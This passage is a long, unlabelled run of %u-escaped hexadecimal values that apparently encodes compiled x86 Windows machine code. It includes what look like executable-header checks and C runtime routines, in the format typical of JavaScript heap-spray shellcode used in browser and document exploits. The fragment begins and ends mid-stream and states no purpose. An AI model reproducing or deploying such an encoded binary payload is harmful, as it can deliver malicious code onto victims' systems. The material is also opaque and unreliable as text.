5e%u335f%uc3c0%u068a%uc683%u3a01%u75c6%u8de9%uff7e%u618a%u8402%u74e4%u8a28%u8306%u02c6%uc43a%ube75%u418a%u8403%u74c0%u8a18%uff66%uc183%u3a02%u74c4%uebdf%u33ab%u5ec0%u5f5b%uc28a%u4de9%u0006%u8d00%uff47%u5b5e%uc35f%uc78b%u5b5e%uc35f%uff8b%u8b55%u8bec%u0845%u3353%u56db%u3b57%u74c3%u8b07%u0c7d%ufb3b%u1b77%uf5e8%u0005%u6a00%u5e16%u3089%u5353%u5353%ue853%u057e%u0000%uc483%u8b14%uebc6%u8b3c%u1075%uf33b%u0475%u1888%udaeb%ud08b%u1a38%u0474%u4f42%uf875%ufb3b%uee74%u0e8a%u0a88%u4642%ucb3a%u0374%u754f%u3bf3%u75fb%u8810%ue818%u05ae%u0000%u226a%u8959%u8b08%uebf1%u33b5%u5fc0%u5b5e%uc35d%uff8b%u8b55%u53ec%u8b56%u0875%udb33%u3957%u145d%u1075%uf33b%u1075%u5d39%u750c%u3312%u5fc0%u5b5e%uc35d%uf33b%u0774%u7d8b%u3b0c%u77fb%ue81b%u056c%u0000%u166a%u895e%u5330%u5353%u5353%uf5e8%u0004%u8300%u14c4%uc68b%ud5eb%u5d39%u7514%u8804%ueb1e%u8bca%u1055%ud33b%u0475%u1e88%ud1eb%u7d83%uff14%uc68b%u0f75%u0a8a%u0888%u4240%ucb3a%u1e74%u754f%uebf3%u8a19%u880a%u4008%u3a42%u74cb%u4f08%u0574%u4dff%u7514%u39ee%u145d%u0275%u1888%ufb3b%u8b75%u7d83%uff14%u0f75%u458b%u6a0c%u8850%u065c%u58ff%u78e9%uffff%u88ff%ue81e%u04f2%u0000%u226a%u8959%u8b08%uebf1%u8b82%u55ff%uec8b%u458b%u5608%uf18b%u46c6%u000c%uc085%u6375%u86e8%u0012%u8900%u0846%u488b%u896c%u8b0e%u6848%u4e89%u8b04%u3b0e%u880d%u40a7%u7400%u8b12%ua40d%u40a6%u8500%u7048%u0775%u21e8%u000f%u8900%u8b06%u0446%u053b%ua5a8%u0040%u1674%u468b%u8b08%ua40d%u40a6%u8500%u7048%u0875%u95e8%u0007%u8900%u0446%u468b%uf608%u7040%u7502%u8314%u7048%uc602%u0c46%ueb01%u8b0a%u8908%u8b0e%u0440%u4689%u8b04%u5ec6%uc25d%u0004%uff8b%u8b55%u83ec%u10ec%uff53%u1075%u4d8d%ue8f0%uff65%uffff%udb33%u5d39%u7508%ue82e%u0442%u0000%u5353%u5353%uc753%u1600%u0000%ue800%u03ca%u0000%uc483%u3814%ufc5d%u0774%u458b%u83f8%u7060%ub8fd%uffff%u7fff%uc7e9%u0000%u5600%u758b%u3b0c%u75f3%ue82e%u040c%u0000%u5353%u5353%uc753%u1600%u0000%ue800%u0394%u0000%uc483%u3814%ufc5d%u0774%u458b%u83f8%u7060%ub8fd%uffff%u7fff%u90e9%u0000%u5700%u7d8b%u39f4%u085f%u1075%uff56%u0875%u69e8%u0014%u5900%ue959%u0081%u0000%u458b%u6608%ub60f%uff00%u0845%ub70f%u0fc8%uc1b6%u44f6%u1d38%u7404%u8b1d%u0845%u008a%uc33a%u0475%uc933%u10eb%ue1c1%u6608%ub60f%u66c0%uc80b%u45ff%u0f08%uc9b7%u0f66%u06b6%ub70f%u0fc0%ud0b6%uf646%u3a44%u041d%u1874%u168a%ud33a%u0475%uc033%u0eeb%ue0c1%u6608%ub60f%u66d2%uc20b%ub70f%u46c0%u3b66%u75c1%u6618%ucb3b%u9875%u5d38%u74fc%u8b07%uf845%u6083%ufd70%uc033%u5e5f%uc95b%u1bc3%u83c0%u02e0%u3848%ufc5d%uf074%u4d8b%u83f8%u7061%uebfd%u8be7%u55ff%uec8b%u006a%u75ff%uff0c%u0875%uc7e8%ufffe%u83ff%u0cc4%uc35d%uff8b%u8b55%u83ec%u683d%u40ac%u0200%u0574%u64e8%u0019%uff00%u0875%ub1e8%u0017%u6800%u00ff%u0000%uf3e8%u0014%u5900%u5d59%u6ac3%u6814%u9560%u0040%u17e8%u0022%ub800%u5a4d%u0000%u3966%u0005%u4000%u7500%ua138%u003c%u0040%ub881%u0000%u0040%u4550%u0000%u2775%u0bb9%u0001%u6600%u8839%u0018%u0040%u1975%ub883%u0074%u0040%u760e%u3310%u39c9%ue888%u4000%u0f00%uc195%u4d89%uebe4%u8304%ue465%u6a00%ue801%u2195%u0000%u8559%u75c0%u6a08%ue81c%uff6e%uffff%ue859%u118a%u0000%uc085%u0875%u106a%u5de8%uffff%u59ff%u26e8%u0021%u8300%ufc65%ue800%u1ec9%u0000%uc085%u087d%u1b6a%u07e8%u0014%u5900%u15ff%u8068%u0040%uf8a3%u40b7%ue800%u1d76%u0000%u60a3%u40ac%ue800%u1cb1%u0000%uc085%u087d%u086a%ue1e8%u0013%u5900%u28e8%u001a%u8500%u7dc0%u6a08%ue809%u13d0%u0000%u6a59%ue801%u1487%u0000%u8559%u74c0%u5007%ubde8%u0013%u5900%ud0a1%u40ac%ua300%uacd4%u0040%uff50%uc835%u40ac%uff00%uc435%u40ac%ue800%ueff8%uffff%uc483%u890c%ue045%u7d83%u00e4%u0675%ue850%u15fe%u0000%u25e8%u0016%ueb00%u8b2e%uec45%u088b%u098b%u4d89%u50dc%ue851%u1863%u0000%u5959%u8bc3%ue865%u458b%u89dc%ue045%u7d83%u00e4%u0675%ue850%u15e4%u0000%u04e8%u0016%uc700%ufc45%ufffe%uffff%u458b%ue8e0%u2117%u0000%ue8c3%u22b8%u0000%ua4e9%ufffe%u8bff%u55ff%uec8b%u458b%ua308%uac6c%u0040%uc35d%uff8b%u8b55%u81ec%u28ec%u0003%ua100%ua8b4%u0040%uc533%u4589%u83fc%ud8a5%ufffc%u00ff%u6a53%u8d4c%udc85%ufffc%u6aff%u5000%u2be8%u0023%u8d00%ud885%ufffc%u89ff%u2885%ufffd%u8dff%u3085%ufffd%u83ff%u0cc4%u8589%ufd2c%uffff%u8589%ufde0%uffff%u8d89%ufddc%uffff%u9589%ufdd8%uffff%u9d89%ufdd4%uffff%ub589%ufdd0%uffff%ubd89%ufdcc%uffff%u8c66%uf895%ufffd%u66ff%u8d8c%ufdec%uffff%u8c66%uc89d%ufffd%u66ff%u858c%ufdc4%uffff%u8c66%uc0a5%ufffd%u66ff%uad8c%ufdbc%uffff%u8f9c%uf085%ufffd%u8bff%u0445%u4d8d%uc704%u3085%ufffd%u01ff%u0100%u8900%ue885%ufffd%u89ff%uf48d%ufffd%u8bff%ufc49%u8d89%ufde4%uffff%u85c7%ufcd8%uffff%u0417%uc000%u85c7%ufcdc%uffff%u0001%u0000%u8589%ufce4%uffff%u15ff%u802c%u0040%u006a%ud88b%u15ff%u8078%u0040%u858d%ufd28%uffff%uff50%u7415%u4080%u8500%u75c0%u850c%u75db%u6a08%ue802%u2232%u0000%u6859%u0417%uc000%u15ff%u8070%u0040%uff50%u6c15%u4080%u8b00%ufc4d%ucd33%ue85b%u221c%u0000%uc3c9%uff8b%u8b55%uffec%u6c35%u40ac%ue800%u0bc1%u0000%u8559%u74c0%u5d03%ue0ff%u026a%uf3e8%u0021%u5900%ue95d%ufeb2%uffff%uff8b%u8b55%u8bec%u0845%uc933%u043b%u08cd%u40a0%u7400%u4113%uf983%u722d%u8df1%ued48%uf983%u7711%u6a0e%u580d%uc35d%u048b%u0ccd%u40a0%u5d00%u05c3%uff44%uffff%u0e6a%u3b59%u1bc8%u23c0%u83c1%u08c0%uc35d%u37e8%u000d%u8500%u75c0%ub806%ua170%u0040%u83c3%u08c0%uccc3%ucccc%ucccc%u428d%u5bff%u8dc3%u24a4%u0000%u0000%u648d%u0024%uc033%u448a%u0824%u8b53%uc1d8%u08e0%u548b%u0824%uc2f7%u0003%u0000%u1574%u0a8a%uc283%u3a01%u74cb%u84cf%u74c9%uf751%u03c2%u0000%u7500%u0beb%u57d8%uc38b%ue3c1%u5610%ud80b%u0a8b%uffbf%ufefe%u8b7e%u8bc1%u33f7%u03cb%u03f0%u83f9%ufff1%uf083%u33ff%u33cf%u83c6%u04c2%ue181%u0100%u8101%u1c75%u0025%u0101%u7481%u25d3%u0100%u0101%u0875%ue681%u0000%u8000%uc475%u5f5e%u335b%uc3c0%u428b%u3afc%u74c3%u8436%u74c0%u3aef%u74e3%u8427%u74e4%uc1e7%u10e8%uc33a%u1574%uc084%udc74%ue33a%u0674%ue484%ud474%u96eb%u5f5e%u428d%u5bff%u8dc3%ufe42%u5f5e%uc35b%u428d%u5efd%u5b5f%u8dc3%ufc42%u5f5e%uc35b%ua42d%u0003%u7400%u8322%u04e8%u1774%ue883%u740d%u480c%u0374%uc033%ub8c3%u0404%u0000%ub8c3%u0412%u0000%ub8c3%u0804%u0000%ub8c3%u0411%u0000%u8bc3%u56ff%u8b57%u68f0%u0101%u0000%uff33%u468d%u571c%ue850%u209c%u0000%uc033%ub70f%u8bc8%u89c1%u047e%u7e89%u8908%u0c7e%ue1c1%u0b10%u8dc1%u107e%uabab%ub9ab%ua180%u0040%uc483%u8d0c%u1c46%uce2b%u01bf%u0001%u8a00%u0114%u1088%u4f40%uf775%u868d%u011d%u0000%u00be%u0001%u8a00%u0814%u1088%u4e40%uf775%u5e5f%u8bc3%u55ff%uec8b%uec81%u051c%u0000%ub4a1%u40a8%u3300%u89c5%ufc45%u5753%u858d%ufae8%uffff%uff50%u0476%u15ff%u807c%u0040%u00bf%u0001%u8500%u0fc0%ufb84%u0000%u3300%u88c0%u0584%ufefc%uffff%u3b40%u72c7%u8af4%uee85%ufffa%uc6ff%ufc85%ufffe%u20ff%uc084%u2e74%u9d8d%ufaef%uffff%ub60f%u0fc8%u03b6%uc83b%u1677%uc12b%u5040%u948d%ufc0d%ufffe%u6aff%u5220%ud9e8%u001f%u8300%u0cc4%u8a43%u4303%uc084%ud875%u006a%u76ff%u8d0c%ufc85%ufffa%uffff%u0476%u5750%u858d%ufefc%uffff%u6a50%u6a01%ue800%u25ec%u0000%udb33%uff53%u0476%u858d%ufdfc%uffff%u5057%u8d57%ufc85%ufffe%u50ff%uff57%u0c76%ue853%u23cd%u0000%uc483%u5344%u76ff%u8d04%ufc85%ufffc%u57ff%u5750%u858d%ufefc%uffff%u6850%u0200%u0000%u76ff%u530c%ua8e8%u0023%u8300%u24c4%uc033%ub70f%u458c%ufafc%uffff%uc1f6%u7401%u800e%u064c%u101d%u8c8a%ufc05%ufffd%uebff%uf611%u02c1%u1574%u4c80%u1d06%u8a20%u058c%ufcfc%uffff%u8c88%u1d06%u0001%ueb00%uc608%u0684%u011d%u0000%u4000%uc73b%ube72%u56eb%u868d%u011d%u0000%u85c7%ufae4%uffff%uff9f%uffff%uc933%u8529%ufae4%uffff%u958b%ufae4%uffff%u848d%u1d0e%u0001%u0300%u8dd0%u205a%ufb83%u7719%u800c%u0e4c%u101d%ud18a%uc280%ueb20%u830f%u19fa%u0e77%u4c80%u1d0e%u8a20%u80d1%u20ea%u1088%u03eb%u00c6%u4100%ucf3b%uc272%u4d8b%u5ffc%ucd33%ue85b%u1ea8%u0000%uc3c9%u0c6a%u8068%u4095%ue800%u1c10%u0000%u98e8%u000a%u8b00%ua1f8%ua6a4%u0040%u4785%u7470%u831d%u6c7f%u7400%u8b17%u6877%uf685%u0875%u206a%u63e8%u000e%u5900%uc68b%u28e8%u001c%uc300%u0d6a%u77e8%u0026%u5900%u6583%u00fc%u778b%u8968%ue475%u353b%ua5a8%u0040%u3674%uf685%u1a74%uff56%u8415%u4080%u8500%u75c0%u810f%u80fe%u40a1%u7400%u5607%u7ae8%u0026%u5900%ua8a1%u40a5%u8900%u6847%u358b%ua5a8%u0040%u7589%u56e4%u15ff%u8080%u0040%u45c7%ufefc%uffff%ue8ff%u0005%u0000%u8eeb%u758b%u6ae4%ue80d%u253c%u0000%uc359%uff8b%u8b55%u83ec%u10ec%u3353%u53db%u4d8d%ue8f0%uf753%uffff%u1d89%uac70%u0040%ufe83%u75fe%uc71e%u7005%u40ac%u0100%u0000%uff00%u8c15%u4080%u3800%ufc5d%u4574%u4d8b%u83f8%u7061%uebfd%u833c%ufdfe%u1275%u05c7%uac70%u0040%u0001%u0000%u15ff%u8088%u0040%udbeb%ufe83%u75fc%u8b12%uf045%u408b%uc704%u7005%u40ac%u0100%u0000%ueb00%u38c4%ufc5d%u0774%u458b%u83f8%u7060%u8bfd%u5bc6%uc3c9%uff8b%u8b55%u83ec%u20ec%ub4a1%u40a8%u3300%u89c5%ufc45%u8b53%u0c5d%u8b56%u0875%ue857%uff64%uffff%uf88b%uf633%u7d89%u3b08%u75fe%u8b0e%ue8c3%ufcb7%uffff%uc033%u9de9%u0001%u8900%ue475%uc033%ub839%ua5b0%u0040%u840f%u0091%u0000%u45ff%u83e4%u30c0%uf03d%u0000%u7200%u81e7%ue8ff%u00fd%u0f00%u7084%u0001%u8100%ue9ff%u00fd%u0f00%u6484%u0001%u0f00%uc7b7%uff50%u9015%u4080%u8500%u0fc0%u5284%u0001%u8d00%ue845%u5750%u15ff%u807c%u0040%uc085%u840f%u0133%u0000%u0168%u0001%u8d00%u1c43%u5056%uf9e8%u001c%u3300%u42d2%uc483%u890c%u047b%u7389%u390c%ue855%u860f%u00f8%u0000%u7d80%u00ee%u840f%u00cf%u0000%u758d%u8aef%u840e%u0fc9%uc284%u0000%u0f00%u46b6%u0fff%uc9b6%ua6e9%u0000%u6800%u0101%u0000%u438d%u561c%ue850%u1cb2%u0000%u4d8b%u83e4%u0cc4%uc96b%u8930%ue075%ub18d%ua5c0%u0040%u7589%uebe4%u8a2a%u0146%uc084%u2874%ub60f%u0f3e%uc0b6%u12eb%u458b%u8ae0%uac80%u40a5%u0800%u3b44%u0f1d%u46b6%u4701%uf83b%uea76%u7d8b%u4608%u8046%u003e%ud175%u758b%uffe4%ue045%uc683%u8308%ue07d%u8904%ue475%ue972%uc78b%u7b89%uc704%u0843%u0001%u0000%u67e8%ufffb%u6aff%u8906%u0c43%u438d%u8d10%ub489%u40a5%u5a00%u8b66%u4131%u8966%u4130%u4040%u754a%u8bf3%ue8f3%ufbd7%uffff%ub7e9%ufffe%u80ff%u034c%u041d%u3b40%u76c1%u46f6%u8046%uff7e%u0f00%u3485%uffff%u8dff%u1e43%ufeb9%u0000%u8000%u0808%u4940%uf975%u438b%ue804%ufb12%uffff%u4389%u890c%u0853%u03eb%u7389%u3308%u0fc0%uc8b7%uc18b%ue1c1%u0b10%u8dc1%u107b%uabab%uebab%u39a8%u7035%u40ac%u0f00%u5885%ufffe%u83ff%uffc8%u4d8b%u5ffc%u335e%u5bcd%ua3e8%u001b%uc900%u6ac3%u6814%u95a0%u0040%u0be8%u0019%u8300%ue04d%ue8ff%u078f%u0000%uf88b%u7d89%ue8dc%ufcdc%uffff%u5f8b%u8b68%u0875%u75e8%ufffd%u89ff%u0845%u433b%u0f04%u5784%u0001%u6800%u0220%u0000%u34e8%u0024%u5900%ud88b%udb85%u840f%u0146%u0000%u88b9%u0000%u8b00%u6877%ufb8b%ua5f3%u2383%u5300%u75ff%ue808%ufdb8%uffff%u5959%u4589%u85e0%u0fc0%ufc85%u0000%u8b00%udc75%u76ff%uff68%u8415%u4080%u8500%u75c0%u8b11%u6846%u803d%u40a1%u7400%u5007%u56e8%u0023%u5900%u5e89%u5368%u3d8b%u8080%u0040%ud7ff%u46f6%u0270%u850f%u00ea%u0000%u05f6%ua6a4%u0040%u0f01%udd85%u0000%u6a00%ue80d%u22f8%u0000%u8359%ufc65%u8b00%u0443%u80a3%u40ac%u8b00%u0843%u84a3%u40ac%u8b00%u0c43%u88a3%u40ac%u3300%u89c0%ue445%uf883%u7d05%u6610%u4c8b%u1043%u8966%u450c%uac74%u0040%ueb40%u33e8%u89c0%ue445%u013d%u0001%u7d00%u8a0d%u184c%u881c%ua088%u40a3%u4000%ue9eb%uc033%u4589%u3de4%u0100%u0000%u107d%u8c8a%u1d18%u0001%u8800%ua888%u40a4%u4000%ue6eb%u35ff%ua5a8%u0040%u15ff%u8084%u0040%uc085%u1375%ua8a1%u40a5%u3d00%ua180%u0040%u0774%ue850%u229d%u0000%u8959%ua81d%u40a5%u5300%ud7ff%u45c7%ufefc%uffff%ue8ff%u0002%u0000%u30eb%u0d6a%u71e8%u0021%u5900%uebc3%u8325%ufff8%u2075%ufb81%ua180%u0040%u0774%ue853%u2267%u0000%ue859%uf86a%uffff%u00c7%u0016%u0000%u04eb%u6583%u00e0%u458b%ue8e0%u17c3%u0000%u83c3%uec3d%u40b7%u0000%u1275%ufd6a%u56e8%ufffe%u59ff%u05c7%ub7ec%u0040%u0001%u0000%uc033%u8bc3%u55ff%uec8b%u5653%u758b%u8b08%ubc86%u0000%u3300%u57db%uc33b%u6f74%ua83d%u40aa%u7400%u8b68%ub086%u0000%u3b00%u74c3%u395e%u7518%u8b5a%ub886%u0000%u3b00%u74c3%u3917%u7518%u5013%ueee8%u0021%uff00%ubcb6%u0000%ue800%u252a%u0000%u5959%u868b%u00b4%u0000%uc33b%u1774%u1839%u1375%ue850%u21cd%u0000%ub6ff%u00bc%u0000%uc4e8%u0024%u5900%uff59%ub0b6%u0000%ue800%u21b5%u0000%ub6ff%u00bc%u0000%uaae8%u0021%u5900%u8b59%uc086%u0000%u3b00%u74c3%u3944%u7518%u8b40%uc486%u0000%u2d00%u00fe%u0000%ue850%u2189%u0000%u868b%u00cc%u0000%u80bf%u0000%u2b00%u50c7%u76e8%u0021%u8b00%ud086%u0000%u2b00%u50c7%u68e8%u0021%uff00%uc0b6%u0000%ue800%u215d%u0000%uc483%u8d10%ud4be%u0000%u8b00%u3d07%ua9e8%u0040%u1774%u9839%u00b4%u0000%u0f75%ue850%u22aa%u0000%u37ff%u36e8%u0021%u5900%u8d59%u507e%u45c7%u0608%u0000%u8100%uf87f%ua6a8%u0040%u1174%u078b%uc33b%u0b74%u1839%u0775%ue850%u2111%u0000%u3959%ufc5f%u1274%u478b%u3b04%u74c3%u390b%u7518%u5007%ufae8%u0020%u5900%uc783%uff10%u084d%uc775%ue856%u20eb%u0000%u5f59%u5b5e%uc35d%uff8b%u8b55%u53ec%u8b56%u8035%u4080%u5700%u7d8b%u5708%ud6ff%u878b%u00b0%u0000%uc085%u0374%uff50%u8bd6%ub887%u0000%u8500%u74c0%u5003%ud6ff%u878b%u00b4%u0000%uc085%u0374%uff50%u8bd6%uc087%u0000%u8500%u74c0%u5003%ud6ff%u5f8d%uc750%u0845%u0006%u0000%u7b81%ua8f8%u40a6%u7400%u8b09%u8503%u74c0%u5003%ud6ff%u7b83%u00fc%u0a74%u438b%u8504%u74c0%u5003%ud6ff%uc383%uff10%u084d%ud675%u878b%u00d4%u0000%ub405%u0000%u5000%ud6ff%u5e5f%u5d5b%u8bc3%u55ff%uec8b%u8b57%u087d%uff85%u840f%u0083%u0000%u5653%u358b%u8084%u0040%uff57%u8bd6%ub087%u0000%u8500%u74c0%u5003%ud6ff%u878b%u00b8%u0000%uc085%u0374%uff50%u8bd6%ub487%u0000%u8500%u74c0%u5003%ud6ff%u878b%u00c0%u0000%uc085%u0374%uff50%u8dd6%u505f%u45c7%u0608%u0000%u8100%uf87b%ua6a8%u0040%u0974%u038b%uc085%u0374%uff50%u83d6%ufc7b%u7400%u8b0a%u0443%uc085%u0374%uff50%u83d6%u10c3%u4dff%u7508%u8bd6%ud487%u0000%u0500%u00b4%u0000%uff50%u5ed6%u8b5b%u5fc7%uc35d%uff85%u3774%uc085%u3374%u8b56%u3b30%u74f7%u5728%u3889%uc1e8%ufffe%u59ff%uf685%u1b74%ue856%uff45%uffff%u3e83%u5900%u0f75%ufe81%ua6b0%u0040%u0774%ue856%ufd59%uffff%u8b59%u5ec7%u33c3%uc3c0%u0c6a%uc068%u4095%ue800%u14a4%u0000%u2ce8%u0003%u8b00%ua1f0%ua6a4%u0040%u4685%u7470%u8322%u6c7e%u7400%ue81c%u0315%u0000%u708b%u856c%u75f6%u6a08%ue820%u06f2%u0000%u8b59%ue8c6%u14b7%u0000%u6ac3%ue80c%u1f06%u0000%u8359%ufc65%u8d00%u6c46%u3d8b%ua788%u0040%u69e8%uffff%u89ff%ue445%u45c7%ufefc%uffff%ue8ff%u0002%u0000%uc1eb%u0c6a%u01e8%u001e%u5900%u758b%uc3e4%uff8b%u8b55%u56ec%u35ff%ua79c%u0040%u358b%u8098%u0040%ud6ff%uc085%u2174%u98a1%u40a7%u8300%ufff8%u1774%uff50%u9c35%u40a7%uff00%uffd6%u85d0%u74c0%u8b08%uf880%u0001%ueb00%ube27%u8210%u0040%uff56%u9415%u4080%u8500%u75c0%u560b%u33e8%u0006%u5900%uc085%u1874%u0068%u4082%u5000%u15ff%u801c%u0040%uc085%u0874%u75ff%uff08%u89d0%u0845%u458b%u5e08%uc35d%u006a%u87e8%uffff%u59ff%u8bc3%u55ff%uec8b%uff56%u9c35%u40a7%u8b00%u9835%u4080%uff00%u85d6%u74c0%ua121%ua798%u0040%uf883%u74ff%u5017%u35ff%ua79c%u0040%ud6ff%ud0ff%uc085%u0874%u808b%u01fc%u0000%u27eb%u10be%u4082%u5600%u15ff%u8094%u0040%uc085%u0b75%ue856%u05b8%u0000%u8559%u74c0%u6818%u822c%u0040%uff50%u1c15%u4080%u8500%u74c0%uff08%u0875%ud0ff%u4589%u8b08%u0845%u5d5e%uffc3%u9c15%u4080%uc200%u0004%uff8b%uff56%u9c35%u40a7%uff00%u9815%u4080%u8b00%u85f0%u75f6%uff1b%ub435%u40ac%ue800%uff65%uffff%u8b59%u56f0%u35ff%ua79c%u0040%u15ff%u80a0%u0040%uc68b%uc35e%u98a1%u40a7%u8300%ufff8%u1674%uff50%ubc35%u40ac%ue800%uff3b%uffff%uff59%u83d0%u980d%u40a7%uff00%u9ca1%u40a7%u8300%ufff8%u0e74%uff50%ua415%u4080%u8300%u9c0d%u40a7%uff00%u3ee9%u001c%u6a00%u680c%u95e0%u0040%uc7e8%u0012%ube00%u8210%u0040%uff56%u9415%u4080%u8500%u75c0%u5607%uf9e8%u0004%u5900%u4589%u8be4%u0875%u46c7%u585c%u4088%u3300%u47ff%u7e89%u8514%u74c0%u6824%u8200%u0040%u8b50%u1c1d%u4080%uff00%u89d3%uf886%u0001%u6800%u822c%u0040%u75ff%uffe4%u89d3%ufc86%u0001%u8900%u707e%u86c6%u00c8%u0000%uc643%u4b86%u0001%u4300%u46c7%u8068%u40a1%u6a00%ue80d%u1cf2%u0000%u8359%ufc65%uff00%u6876%u15ff%u8080%u0040%u45c7%ufefc%uffff%ue8ff%u003e%u0000%u0c6a%ud1e8%u001c%u5900%u7d89%u8bfc%u0c45%u4689%u856c%u75c0%ua108%ua788%u0040%u4689%uff6c%u6c76%u01e8%ufffc%u59ff%u45c7%ufefc%uffff%ue8ff%u0015%u0000%u4ae8%u0012%uc300%uff33%u8b47%u0875%u0d6a%ub9e8%u001b%u5900%u6ac3%ue80c%u1bb0%u0000%uc359%uff8b%u5756%u15ff%u8018%u0040%u35ff%ua798%u0040%uf88b%u91e8%ufffe%uffff%u8bd0%u85f0%u75f6%u684e%u0214%u0000%u016a%u63e8%u001d%u8b00%u59f0%u8559%u74f6%u563a%u35ff%ua798%u0040%u35ff%uacb8%u0040%ue8e8%ufffd%u59ff%ud0ff%uc085%u1874%u006a%ue856%ufec5%uffff%u5959%u15ff%u80ac%u0040%u4e83%uff04%u0689%u09eb%ue856%u1c51%u0000%u3359%u57f6%u15ff%u80a8%u0040%u8b5f%u5ec6%u8bc3%u56ff%u7fe8%uffff%u8bff%u85f0%u75f6%u6a08%ue810%u03d6%u0000%u8b59%u5ec6%u6ac3%u6808%u9608%u0040%u4de8%u0011%u8b00%u0875%uf685%u840f%u00f8%u0000%u468b%u8524%u74c0%u5007%u04e8%u001c%u5900%u468b%u852c%u74c0%u5007%uf6e8%u001b%u5900%u468b%u8534%u74c0%u5007%ue8e8%u001b%u5900%u468b%u853c%u74c0%u5007%udae8%u001b%u5900%u468b%u8540%u74c0%u5007%ucce8%u001b%u5900%u468b%u8544%u74c0%u5007%ubee8%u001b%u5900%u468b%u8548%u74c0%u5007%ub0e8%u001b%u5900%u468b%u3d5c%u8858%u0040%u0774%ue850%u1b9f%u0000%u6a59%ue80d%u1b64%u0000%u8359%ufc65%u8b00%u687e%uff85%u1a74%uff57%u8415%u4080%u8500%u75c0%u810f%u80ff%u40a1%u7400%u5707%u72e8%u001b%u5900%u45c7%ufefc%uffff%ue8ff%u0057%u0000%u0c6a%u2be8%u001b%u5900%u45c7%u01fc%u0000%u8b00%u6c7e%uff85%u2374%ue857%ufaf3%uffff%u3b59%u883d%u40a7%u7400%u8114%ub0ff%u40a6%u7400%u830c%u003f%u0775%ue857%uf8ff%uffff%uc759%ufc45%ufffe%uffff%u1ee8%u0000%u5600%u1ae8%u001b%u5900%u8ae8%u0010%uc200%u0004%u758b%u6a08%ue80d%u19fa%u0000%uc359%u758b%u6a08%ue80c%u19ee%u0000%uc359%uff8b%u5756%u10be%u4082%u5600%u15ff%u8094%u0040%uc085%u0775%ue856%u0258%u0000%u8b59%u85f8%u0fff%u5e84%u0001%u8b00%u1c35%u4080%u6800%u825c%u0040%uff57%u68d6%u8250%u0040%ua357%uacb0%u0040%ud6ff%u4468%u4082%u5700%ub4a3%u40ac%uff00%u68d6%u823c%u0040%ua357%uacb8%u0040%ud6ff%u3d83%uacb0%u0040%u8b00%ua035%u4080%ua300%uacbc%u0040%u1674%u3d83%uacb4%u0040%u7400%u830d%ub83d%u40ac%u0000%u0474%uc085%u2475%u98a1%u4080%ua300%uacb4%u0040%ua4a1%u4080%uc700%ub005%u40ac%ue300%u402d%u8900%ub835%u40ac%ua300%uacbc%u0040%u15ff%u809c%u0040%u9ca3%u40a7%u8300%ufff8%u840f%u00cc%u0000%u35ff%uacb4%u0040%uff50%u85d6%u0fc0%ubb84%u0000%ue800%u048a%u0000%u35ff%uacb0%u0040%u13e8%ufffb%uffff%ub435%u40ac%ua300%uacb0%u0040%u03e8%ufffb%uffff%ub835%u40ac%ua300%uacb4%u0040%uf3e8%ufffa%uffff%ubc35%u40ac%ua300%uacb8%u0040%ue3e8%ufffa%u83ff%u10c4%ubca3%u40ac%ue800%u1830%u0000%uc085%u6574%ud768%u402f%uff00%ub035%u40ac%ue800%ufb3d%uffff%uff59%ua3d0%ua798%u0040%uf883%u74ff%u6848%u0214%u0000%u016a%u85e8%u001a%u8b00%u59f0%u8559%u74f6%u5634%u35ff%ua798%u0040%u35ff%uacb8%u0040%u0ae8%ufffb%u59ff%ud0ff%uc085%u1b74%u006a%ue856%ufbe7%uffff%u5959%u15ff%u80ac%u0040%u4e83%uff04%u0689%uc033%ueb40%ue807%ufb92%uffff%uc033%u5e5f%uccc3%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%u548b%u0424%u4c8b%u0824%uc2f7%u0003%u0000%u3c75%u028b%u013a%u2e75%uc00a%u2674%u613a%u7501%u0a25%u74e4%uc11d%u10e8%u413a%u7502%u0a19%u74c0%u3a11%u0361%u1075%uc183%u8304%u04c2%ue40a%ud275%uff8b%uc033%u90c3%uc01b%ue0d1%uc083%uc301%uc2f7%u0001%u0000%u1874%u028a%uc283%u3a01%u7501%u83e7%u01c1%uc00a%udc74%uc2f7%u0002%u0000%ua474%u8b66%u8302%u02c2%u013a%uce75%uc00a%uc674%u613a%u7501%u0ac5%u74e4%u83bd%u02c1%u88eb%uff8b%u8b55%u8bec%u0845%u008b%u3881%u7363%ue06d%u2a75%u7883%u0310%u2475%u408b%u3d14%u0520%u1993%u1574%u213d%u9305%u7419%u3d0e%u0522%u1993%u0774%u003d%u9940%u7501%ue805%u216c%u0000%uc033%uc25d%u0004%u2868%u4033%uff00%u7815%u4080%u3300%uc3c0%uff8b%u8b55%u57ec%ue8bf%u0003%u5700%u15ff%u803c%u0040%u75ff%uff08%u9415%u4080%u8100%ue8c7%u0003%u8100%u60ff%u00ea%u7700%u8504%u74c0%u5fde%uc35d%uff8b%u8b55%ue8ec%u04a9%u0000%u75ff%ue808%u02f6%u0000%u35ff%ua7a0%u0040%uace8%ufff9%u68ff%u00ff%u0000%ud0ff%uc483%u5d0c%u8bc3%u55ff%uec8b%u7868%u4082%uff00%u9415%u4080%u8500%u74c0%u6815%u8268%u0040%uff50%u1c15%u4080%u8500%u74c0%uff05%u0875%ud0ff%uc35d%uff8b%u8b55%uffec%u0875%uc8e8%uffff%u59ff%u75ff%uff08%u4c15%u4080%ucc00%u086a%ub1e8%u0017%u5900%u6ac3%ue808%u16ce%u0000%uc359%uff8b%u8b55%u56ec%uf08b%u0beb%u068b%uc085%u0274%ud0ff%uc683%u3b04%u0875%uf072%u5d5e%u8bc3%u55ff%uec8b%u8b56%u0875%uc033%u0feb%uc085%u1075%u0e8b%uc985%u0274%ud1ff%uc683%u3b04%u0c75%uec72%u5d5e%u8bc3%u55ff%uec8b%u3d83%ub7f0%u0040%u7400%u6819%ub7f0%u0040%u91e8%u0022%u5900%uc085%u0a74%u75ff%uff08%uf015%u40b7%u5900%uc5e8%u0021%u6800%u8168%u0040%u5468%u4081%ue800%uffa1%uffff%u5959%uc085%u4275%ud968%u4040%ue800%u218f%u0000%u4cb8%u4081%uc700%u2404%u8150%u0040%u63e8%uffff%u83ff%uf43d%u40b7%u0000%u7459%u681b%ub7f4%u0040%u39e8%u0022%u5900%uc085%u0c74%u006a%u026a%u006a%u15ff%ub7f4%u0040%uc033%uc35d%u186a%u3068%u4096%ue800%u0c38%u0000%u086a%ucde8%u0016%u5900%u6583%u00fc%udb33%u3943%uf01d%u40ac%u0f00%uc584%u0000%u8900%uec1d%u40ac%u8a00%u1045%ue8a2%u40ac%u8300%u0c7d%u0f00%u9d85%u0000%uff00%ue835%u40b7%ue800%uf83b%uffff%u8b59%u89f8%ud87d%uff85%u